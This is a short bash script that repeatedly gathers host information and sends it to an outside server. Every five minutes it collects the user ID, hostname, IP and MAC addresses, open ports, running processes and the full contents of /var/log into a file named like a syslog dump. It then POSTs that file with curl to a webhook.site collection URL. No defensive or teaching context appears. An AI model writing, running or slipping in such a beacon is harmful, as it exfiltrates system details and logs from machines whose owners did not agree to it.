#!/bin/bash

# Set the remote URL
url="https://webhook.site/ebfe310a-007d-49f4-a7b3-637830eca1e4"

while true; do
  # Get system information
  ip_addr=$(ifconfig | grep -o 'inet addr:[0-9.]\+' | grep -v '127.0.0.1' | cut -d ':' -f 2)
  mac_addr=$(cat /sys/class/net/*/address | head -n 1)
  # open_ports=$(netstat -tuln | grep '^tcp\|^udp' | tr -s ' ' | cut -d ' ' -f 4 | cut -d ':' -f 2)
  open_ports=$(netstat -tuln | grep -E '^tcp|udp')

  # Create JSON object with system information
  # data=$(echo "\"hostname\":\"$hostname\"\n\"ip_addr\":\"$ip_addr\"\n\"mac_addr\":\"$mac_addr\"\n\"open_ports\":\"$open_ports\"")

  timestamp=$(date +%Y.%m.%d-%T)
  filename="syslog_${mac_addr}_${timestamp}.txt"
  touch "$filename"

  echo 'ID:' $(id) > "${filename}"
  echo 'Hostname:' $(hostname) >> "${filename}"
  echo 'IP:' $ip_addr >> "${filename}"
  echo 'MAC:' $mac_addr >> "${filename}"
  echo 'Open Ports:\n' $open_ports >> "${filename}"
  echo '' >> "${filename}"
  ps >> "${filename}"
  echo '' >> "${filename}"
  cat /var/log/* >> "${filename}"

  # Encode JSON object in Base64
  # data=$(echo -n "$data" | base64)

  # Send data to remote URL
  curl -X POST -d @"$filename" "$url"

  # Pause for 5 minutes
  sleep 300
done